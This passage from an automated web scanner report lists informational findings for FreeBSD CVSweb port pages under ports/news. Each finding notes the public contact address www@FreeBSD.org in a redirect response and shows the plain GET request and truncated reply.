HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/openftd/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:04 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.245. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-Gateway

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/p5-Gateway

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-Gateway HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-Gateway/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:04 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.246. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-NNML

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/p5-NNML

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-NNML HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-NNML/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:05 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.247. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-NNTPClient

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/p5-NNTPClient

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-NNTPClient HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-NNTPClient/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:05 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7109

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.248. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-News-Article

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/p5-News-Article

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-News-Article HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-News-Article/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:05 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7111

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.249. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-News-Article-NoCeM

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/p5-News-Article-NoCeM

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-News-Article-NoCeM HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-News-Article-NoCeM/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7117

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.250. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-News-Newsrc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/p5-News-Newsrc

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-News-Newsrc HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-News-Newsrc/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.251. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-NewsLib

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/p5-NewsLib

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-NewsLib HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-NewsLib/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.252. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-POE-Component-Client-NNTP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/p5-POE-Component-Client-NNTP

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-POE-Component-Client-NNTP HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-POE-Component-Client-NNTP/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7124

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.253. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-POE-Component-Server-NNTP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/p5-POE-Component-Server-NNTP

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-POE-Component-Server-NNTP HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-POE-Component-Server-NNTP/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:10 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7124

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.254. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/pan

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/pan

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/pan HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/pan/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:11 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.255. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/papercut

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/papercut

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/papercut HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/papercut/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.256. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/pgpmoose

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/pgpmoose

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/pgpmoose HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/pgpmoose/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.257. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/plor

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/plor

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/plor HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/plor/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.258. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/py-pynzb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/py-pynzb

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/py-pynzb HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/py-pynzb/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.259. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/py-twistedNews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/py-twistedNews

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/py-twistedNews HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/py-twistedNews/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:23 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.260. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/py-yenc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/py-yenc

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/py-yenc HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/py-yenc/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:24 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.261. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/pyne

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/pyne

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/pyne HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/pyne/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:25 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.262. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/rawdog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/rawdog

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/rawdog HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/rawdog/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.263. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/rkive

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/rkive

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/rkive HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/rkive/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:37 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.264. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/s-news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/s-news

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/s-news HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/s-news/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:44 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.265. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/sabnzbdplus

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/sabnzbdplus

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/sabnzbdplus HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/sabnzbdplus/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7107

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.266. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slnr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/slnr

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/slnr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/slnr/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:06 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.267. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slrn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/slrn

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/slrn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/slrn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.268. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slrnconf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/slrnconf

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/slrnconf HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/slrnconf/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.269. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slrnface

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/slrnface

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/slrnface HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/slrnface/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.270. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slurp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/slurp

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/slurp HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/slurp/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.271. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/sn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebsd.org
Path:   /cgi/cvsweb.cgi/ports/news/sn

Issue detail

The following email address was disclosed in the response:
  • www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/sn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/sn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7098

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

